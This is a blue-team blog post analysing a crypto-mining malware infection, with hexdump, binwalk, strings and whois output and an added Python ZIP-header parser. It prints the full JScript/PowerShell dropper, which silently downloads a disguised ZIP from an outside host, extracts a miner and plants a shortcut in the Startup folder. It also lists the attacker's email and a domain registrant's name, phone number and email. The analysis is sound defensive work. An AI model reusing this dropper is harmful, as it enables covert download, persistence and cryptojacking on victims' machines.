We've been sitting on this for some time, but as we were tidying our notes we stumbled across this draft post we never really finished. Sadly, there is not too much to tell, but hopefully this will help other blue teamers understand crypto-mining malware infections.

A copy of the PowerShell malware can be found on Pastebin here:

https://pastebin.com/pxKXKKAY

The investigation started with a bit of PowerShell, launched from a JScript wrapper (rn.js) via WScript.Shell:

new ActiveXObject("WScript.Shell").Run("powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "+String.fromCharCode(34)+"$str0 ="http://gul";$str1 = 'Miner' ;$TempDir = [System.IO.Path]::GetTempPath();$startup = [environment]::getfolderpath('Startup');$url1 = ($str0)+'fup.co/i/00676/e2zlk0e4qr4c.jpg';$output1 = ($TempDir+$str1);$wc = New-Object System.Net.WebClient;$wc.DownloadFile($url1, $output1);Start-Sleep -s 30;$proj_files = Get-Item -Path ($TempDir+$str1);ForEach ($file in $proj_files) {;$filenew1 = $str1 + '.zip';Rename-Item $file $filenew1};Expand-Archive -Path ($TempDir+$filenew1) -DestinationPath ($TempDir) -Force;Start-Sleep -s 20;$str3 = 'update.lnk';Copy-Item ($TempDir+$str3) -Destination $startup ;Start-Sleep -s 10;Invoke-Item ($startup+$str3)"+String.fromCharCode(34),0,false);
minergate-cli -user djamel4art@gmail.com -bcn 1

The payload: http://gulfup.co/i/00676/e2zlk0e4qr4c.jpg

Hexdump of the payload:

$ xxd e2zlk0e4qr4c.jpg
0000000: 504b 0304 1400 0000 0800 665d 3945 22ec  PK........f]9E".
0000010: 0e6f 40ed 5000 00f0 7a00 1100 0000 6d69  .o@.P...z.....mi
0000020: 6e65 7267 6174 652d 636c 692e 6578 65d4  nergate-cli.exe.
0000030: 3a0b 7414 5596 af3a 954e 8514 e942 ba23  :.t.U..:.N...B.#
0000040: 08ab 7104 7526 0c2e 4405 a7fd 2439 d36d  ..q.u&..D...$9.m
0000050: 401b 3ab4 743b cb49 0203 3a31 e320 86ae  @.:.t;.I..:1. ..

Looks like a ZIP file containing a bitcoin miner! The file's magic bytes are 0x504b ("PK"), the ZIP local file header signature, and the first entry name visible in the dump is minergate-cli.exe.
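As an added example (not code from the original post), the following Python script does what the hexdump check above does by hand: it compares the payload's magic bytes against its .jpg extension and walks the ZIP local file headers, parsing the same fields visible in the dump (method, compressed size, name length, entry name). The first 48 bytes are transcribed from the xxd output above; the second archive is a constructed in-memory sample with the entry names seen on this page.

```python
import io
import struct
import zipfile

ZIP_LOCAL_SIG = b"PK\x03\x04"               # 50 4b 03 04: ZIP local file header signature
JPEG_SIG = b"\xff\xd8\xff"                  # what a genuine .jpg starts with
LOCAL_HDR = struct.Struct("<4sHHHHHIIIHH")  # 30-byte local file header, little-endian
# First 48 bytes of the payload, transcribed from the xxd output above (offsets 0x00-0x2f).
PAYLOAD_HEAD = bytes.fromhex(
    "504b0304140000000800665d394522ec"
    "0e6f40ed500000f07a00110000006d69"
    "6e6572676174652d636c692e657865d4")

def classify(filename, data):
    """Return (actual_type, mismatch): what the magic bytes say vs what the extension claims."""
    ext = filename.rsplit(".", 1)[-1].lower()
    claimed = "jpeg" if ext in ("jpg", "jpeg") else ext
    if data.startswith(JPEG_SIG):
        actual = "jpeg"
    elif data.startswith(ZIP_LOCAL_SIG):
        actual = "zip"
    else:
        actual = "unknown"
    return actual, actual != claimed

def walk_local_headers(data):
    """Walk ZIP local file headers from offset 0; the next header sits at
    header(30) + name_len + extra_len + compressed_size, which is why binwalk
    reports entries at 0x0, 0x50ED6F, ... for this payload."""
    entries, off = [], 0
    while len(data) - off >= LOCAL_HDR.size and data[off:off + 4] == ZIP_LOCAL_SIG:
        (_sig, _ver, flags, method, _t, _d, _crc, csize, usize,
         nlen, xlen) = LOCAL_HDR.unpack_from(data, off)
        name = data[off + 30:off + 30 + nlen].decode("cp437", "replace")
        nxt = off + LOCAL_HDR.size + nlen + xlen + csize
        entries.append({"offset": off, "name": name, "method": method,
                        "compressed": csize, "uncompressed": usize, "next": nxt})
        if flags & 0x8 and csize == 0:  # sizes deferred to a data descriptor: cannot walk on
            break
        off = nxt
    return entries

def build_sample():
    """Constructed in-memory archive (not the real payload) using the entry names seen above."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("minergate-cli.exe", b"MZ" + b"\x00" * 100)  # placeholder bytes, not a real PE
        z.writestr("update.lnk", b"L\x00\x00\x00" + b"\x00" * 20)
    return buf.getvalue()
```

Run against the transcribed header, walk_local_headers reports the first entry as minergate-cli.exe with the next header at 0x50ED6F, matching binwalk's second hit below.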

We can use binwalk to extract parts of the binary:

$ binwalk e2zlk0e4qr4c.jpg
DECIMAL HEX DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 Zip archive data, at least v2.0 to extract
5303663 0x50ED6F Zip archive data, at least v2.0 to extract
5461951 0x5357BF Zip archive data, at least v2.0 to extract
5935809 0x5A92C1 Zip archive data, at least v2.0 to extract
7763954 0x7677F2 COBALT boot rom data (Flat boot rom or file system)
8031674 0x7A8DBA Zip archive data, at least v2.0 to extract
...abbreviated...

List of extracted files:

$ ls
0.zip 806577.zip 8A5FFA.zip e2zlk0e4qr4c.jpg rn.js
50ED6F.zip 8065D3.zip 8BD983.zip libeay32.dll ssleay32.dll
5357BF.zip 8265F6.zip Qt5Core.dll minergate-cli.exe update.lnk
5A92C1.zip 8268D8.zip Qt5Network.dll msvcp110.dll vccorlib110.dll
7A8DBA.zip 83D42C.zip Qt5WebSockets.dll msvcr110.dll
7FC82D.zip 83D454.zip cudart32_60.dll platforms

Running strings against the Windows shortcut (update.lnk):

$ strings update.lnk 
/C:\
Users
kamel
AppData
Local
Temp
Ka=.
1SPS
rn.js
C:\Users\kamel\AppData\Local\Temp\rn.js
desktop-4tlqnc3
%temp%\rn.js
Minergate

The miner command:

minergate-cli -user djamel4art@gmail.com -bcn 1

Minergate client command breakdown:

minergate-cli -user <account/email> -<coin type> <cores>

Therefore:

  • account = djamel4art@gmail.com
  • coin = Bytecoin
  • cores = 1

A list of currency/coin types:

  • bcn Bytecoin
  • xmr Monero
  • fcn Fantomcoin
  • dsh Dashcoin
  • qcn QuazarCoin
  • xdn DigitalNote
  • mcn MonetaVerde
  • aeon Aeon coin
  • inf8 Infinium-8

Whois on the domain:

$ whois gulfup.co
Domain Name: gulfup.co
Registry Domain ID: D177495327-CO
Registrar WHOIS Server:
Registrar URL: whois.godaddy.com
Updated Date: 2017-03-11T11:29:25Z
Creation Date: 2017-03-11T11:12:08Z
Registry Expiry Date: 2018-03-10T23:59:59Z
Registrar: GoDaddy.com, Inc.
Registrar IANA ID: 146
Registrar Abuse Contact Email: abuse@godaddy.com
Registrar Abuse Contact Phone: +1.4806242505
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Domain Status: clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited
Domain Status: clientRenewProhibited https://icann.org/epp#clientRenewProhibited
Domain Status: clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited
Registry Registrant ID: C177495323-CO
Registrant Name: Abdulaali Alzahrani
Registrant Organization:
Registrant Street: albaha
Registrant Street: albaha
Registrant Street:
Registrant City: albaha
Registrant State/Province: king abdulaziz
Registrant Postal Code: 61008
Registrant Country: SA
Registrant Phone: +966.564401880
Registrant Phone Ext:
Registrant Fax:
Registrant Fax Ext:
Registrant Email: zx_xs@hotmail.com
Registry Admin ID: C177495325-CO
Tech Name: Abdulaali Alzahrani
Tech Organization:
Tech Street: albaha
Tech Street: albaha
Tech Street:
Tech City: albaha
Tech State/Province: king abdulaziz
Tech Postal Code: 61008
Tech Country: SA
Tech Phone: +966.564401880
Tech Phone Ext:
Tech Fax:
Tech Fax Ext:
Tech Email: zx_xs@hotmail.com
Name Server: aragorn.ns.cloudflare.com
Name Server: melissa.ns.cloudflare.com

whois on the hosting IP range:

$ whois 62.210.139.211
inetnum: 62.210.128.0 - 62.210.255.255
org: ORG-ONLI1-RIPE
netname: IE-POOL-BUSINESS-HOSTING
descr: IP Pool for Iliad-Entreprises Business Hosting Customers
country: FR
admin-c: IENT-RIPE
tech-c: IENT-RIPE
status: LIR-PARTITIONED PA
mnt-by: MNT-TISCALIFR-B2B
created: 2012-11-02T11:40:24Z
last-modified: 2016-02-22T16:26:23Z
source: RIPE
mnt-routes: MNT-TISCALIFR-B2B
mnt-lower: MNT-TISCALIFR-B2B

For more information about Minergate visit: https://minergate.com/

Conclusion

The domain's whois record is fake, the dropped update.lnk file leaked a user name 'kamel', and the Minergate account was a Gmail account, 'djamel4art'. At this point we could not progress any further.
